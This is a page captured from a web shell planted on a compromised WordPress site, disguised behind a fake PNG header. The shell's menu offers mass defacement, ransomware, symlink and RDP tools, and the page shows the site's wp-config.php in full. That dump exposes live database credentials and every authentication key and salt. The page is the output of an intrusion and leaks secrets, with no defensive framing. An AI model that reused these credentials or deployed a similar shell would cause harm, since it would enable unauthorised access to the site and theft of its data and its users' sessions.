\x89PNG\r\n\x1a\n\x00\x00\x00\x0DIHDR\x00\x00\x00\x01\x00 \x00\x00\x01\x08\x06\x00\x00\x00\x1F\x15\xC4\x89\x00\x00\x00 \x0AIDATx\x9Ccb\x00\x00\x00\x06\x00\x03\x1A\x05\x9D\x00\x00 \x00\x00IEND\xAE\x42\x60\x82
| Path : /var/www/html/csarite.com/public_html/ |
|
B-Con CMD Config cPanel C-Rdp D-Log Info Jump Mass Ransom Symlink vHost Zone-H |
| Current File : /var/www/html/csarite.com/public_html/wp-config.php |
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the installation.
* You don't have to use the web site, you can copy this file to "wp-config.php"
* and fill in the values.
*
* This file contains the following configurations:
*
* * Database settings
* * Secret keys
* * Database table prefix
* * Localized language
* * ABSPATH
*
* @link https://wordpress.org/support/article/editing-wp-config-php/
*
* @package WordPress
*/
// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
@ini_set( 'upload_max_size' , '64M' );
@ini_set( 'post_max_size', '64M');
define( 'WP_MEMORY_LIMIT', '256M' );
define( 'DB_NAME', 'csariteadmin_c3f3418c' );
/** Database username */
define( 'DB_USER', 'csariteadmin_4035cd94' );
/** Database password */
define( 'DB_PASSWORD', 'Ri1oojaiDoo' );
/** Database hostname */
define( 'DB_HOST', 'localhost:3306' );
/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );
/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
* Authentication unique keys and salts.
*
* Change these to different unique phrases! You can generate these using
* the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
*
* You can change these at any point in time to invalidate all existing cookies.
* This will force all users to have to log in again.
*
* @since 2.6.0
*/
define('AUTH_KEY', 'O2Npm55e8|rar)ZWy]&9-BMWGd#T@O8D~G)kZ9RR4H!CgLYN9!S:~9~B8gn*9#B[');
define('SECURE_AUTH_KEY', 'g#hxLui)BN/UtqYYl9WCeZAU2:qW8o9U#6t]Mh~@qI)1AI1(07440%h_i&F0K_z_');
define('LOGGED_IN_KEY', '5kI#QGJ7_gt1_7_2AStrY;Q99BTkFW0w3uj;*VG!hN1iMWW32s:1H6(Wx[32bqo|');
define('NONCE_KEY', 'ogNP2)_675l~+NOpUva5RlU8vZ*4jar|)@5F(7vMMa87g5KT71GC50q(1T0p~;2:');
define('AUTH_SALT', 'Kx8+@C937:6_oY&0cHP]6gM-:9%MVnOU22&~91r5JOUCsB10vb7m69JcEE_0*vo1');
define('SECURE_AUTH_SALT', '4~6yC2)9_5#7g8Phcywzo12C@GC3HDwtc][lm%%19G6cAZWJ4sr4]tiF870g_ApK');
define('LOGGED_IN_SALT', 'hTiAP/l8XR4nd40n:Yky:p0ft8R:Fwef;)E]L%PleTiia6)6879P5-@*E*oq4i~o');
define('NONCE_SALT', 'h79@Gt-2a&Hxtk3yqJ)/7*j8:%CJUFZj1d[+[&YxLID8O0Gj3e9Ei(r4;1470/u4');
/**#@-*/
/**
* WordPress database table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'S6A03uOO_';
/* Add any custom values between this line and the "stop editing" line. */
define('WP_ALLOW_MULTISITE', true);
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the documentation.
*
* @link https://wordpress.org/support/article/debugging-in-wordpress/
*/
if ( ! defined( 'WP_DEBUG' ) ) {
define( 'WP_DEBUG', false );
}
/* That's all, stop editing! Happy publishing. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';